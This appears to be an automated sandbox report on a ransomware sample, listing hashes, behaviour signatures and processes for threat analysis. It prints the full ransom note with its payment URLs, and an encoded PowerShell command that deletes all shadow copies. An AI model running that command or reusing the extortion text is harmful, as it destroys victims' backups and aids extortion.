Overview

overview

10

Static

static

10

0243ddd90f...d5.exe

windows7_x64

10

0243ddd90f...d5.exe

windows10-2004_x64

10

Analysis

  • max time kernel
    141s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    05-03-2022 23:21

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    0243ddd90fb70d1a7a6714bce75072254cde9bdb8c36ed2271b49a9aa190d9d5.exe

  • Size

    272KB

  • MD5

    ab1aaa8f96c61684736da00ece5a9c83

  • SHA1

    c41435392d0759af778dd24ea303136b02469123

  • SHA256

    0243ddd90fb70d1a7a6714bce75072254cde9bdb8c36ed2271b49a9aa190d9d5

  • SHA512

    ba25c53c7b5aeea57cde0540071292a7f1b77557ba72119f5fbdf95e840b04e994c81a4a7248375c272eeb34ebe3f41f5ae7f0acc0d3fece477634e6caf28515

Score
10/10
ransomware

Malware Config

Extracted

Path

C:\7358kd+readme.txt

Ransom Note
--=Welcome.Again.==- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion 7358kd. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/08D920D8768424D0 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/08D920D8768424D0 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: eoqslgEdM5aQVVZlmqOKTHQRE7G1AR+mu56RUOVfxbS2LWu+QdcHpDypgT9f4Ciz TxtxiU8Tv0OcWHTMN+E76Zmx+gIuQvYCeKiWTH7ypgR13rPIOTCl40VcfijheCYd FE9lOkGPtKFHAjVoMJCGoypMMAUwweEeGWPP6T69H0Cz3Je5f+nkOfoddJiSXXmX MA3jKwX5FDal4c/TmZ1BTPps9IHRSsCca+kRjhRkboC40BMKJqPTQJa1y91mb+bo caPttvhYcMjzU2BDbRgWFa/OAtaycQHSWEpT2qJiWg+qyXRU59sFvemOCt/WymOh QeAlZvgp4+F5bywQBtlsdf4br/eQ/GGbB+3nGGIA8UB6atTphaQhrZv5rrTfyfS9 XBXknpmt3+CyMecXt7s5EciVGqmhNB4Kz9lBEvmCNcMO9Q37JVdmWICc9WN7ezO2 4CRnDTgwckO4mzSMw0GfbHbeqZdp+YRogwzfoJdZy1KwlFhgOzwwx3lkkzaCxMgY wUYABuH3Lhl013eQGIQ4kAzshZENvVUJiyxlnSTo4GfwHQSRWUf5bW5VMkEQ9fy4 SLLFBSwq/5LRH8IP2K/k8+B3QGCeIp2YsrRnBcfsSDtTVpJ1KtaH0Mdn270SJu2z qSoHxNNsbPTwnM15p/SNujpzf3edj5AJcU0fehrSJN6h8Mtlp2QlNYBBRzusos67 6kKf1Uq8eouwD9ArG9MW8+JA/ZlVTShg2XG//46cFnac7XAwJf1du33+p/wqCokl yhdFkSQ3KQyvfGHGWncwizHxRvXsvQpipsx69Bso4EN7wiau5qQ7RO6oyvs3g0cJ rBHzYXfIi3b74cb8g0B+qmkD0x13oqTqiloSFl6JrF0Y0O0+SbwMUXicgxKwHSzB h4kxOMZccS/nIalbN59tUG739inW0qp2QTaBJq84EIpLw0Z/nya0eevD1PnLli0N BCwfM+RKG7ycwrGhxbeasEPnbYPgHIL/dQeLQn6Du4Xfuqj6YNUg/tG3UPU4FOBO WqAkMOwOXch4hxGjrQ3bevIMI9gCeAAs60QUddyNujjn3Kr23dPOtBOQPhwJAPmt tK0ryGjVmyOm1EFSjpKNrHI/xqnFdH0W0oJZ5Nifoy867GDGGqvYIjYZkVWFgGTb AkBWib52PP58Ndn8kun7PBMH/SZIYUh2183sXMHUp9Ltsc6I72XCwIFFX5EY5RHK 5P2bXlVq228QW5rSeYvBAK/KNhLCOafoXeeNaySqCoN29XsOPjmKsOJfpriEW3Ed +eJLOgJvpEq8768r1iYsdKTTLk0= Extension name: 7358kd ----------------------------------------------------------------------------------------- !!! !!! !!! !!! !!! !!! !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! !!! !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!! !!! !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/08D920D8768424D0

http://decryptor.cc/08D920D8768424D0

Signatures

  • Modifies extensions of user files 6 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Program Files directory 18 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\0243ddd90fb70d1a7a6714bce75072254cde9bdb8c36ed2271b49a9aa190d9d5.exe
    "C:\Users\Admin\AppData\Local\Temp\0243ddd90fb70d1a7a6714bce75072254cde9bdb8c36ed2271b49a9aa190d9d5.exe"
    1⤵
    • Modifies extensions of user files
    • Enumerates connected drives
    • Drops file in System32 directory
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1636
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1088
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:1632
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1032

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1088-56-0x000007FEFC4A1000-0x000007FEFC4A3000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1088-57-0x000007FEF3510000-0x000007FEF406D000-memory.dmp
      Filesize

      11.4MB

      Download
    • memory/1088-58-0x000007FEF5980000-0x000007FEF631D000-memory.dmp
      Filesize

      9.6MB

      Download
    • memory/1088-60-0x0000000002900000-0x0000000002902000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1088-59-0x000000000290B000-0x000000000292A000-memory.dmp
      Filesize

      124KB

      Download
    • memory/1088-63-0x0000000002904000-0x0000000002907000-memory.dmp
      Filesize

      12KB

      Download
    • memory/1088-62-0x0000000002902000-0x0000000002904000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1088-61-0x000007FEF5980000-0x000007FEF631D000-memory.dmp
      Filesize

      9.6MB

      Download
    • memory/1636-55-0x0000000076921000-0x0000000076923000-memory.dmp
      Filesize

      8KB

      Download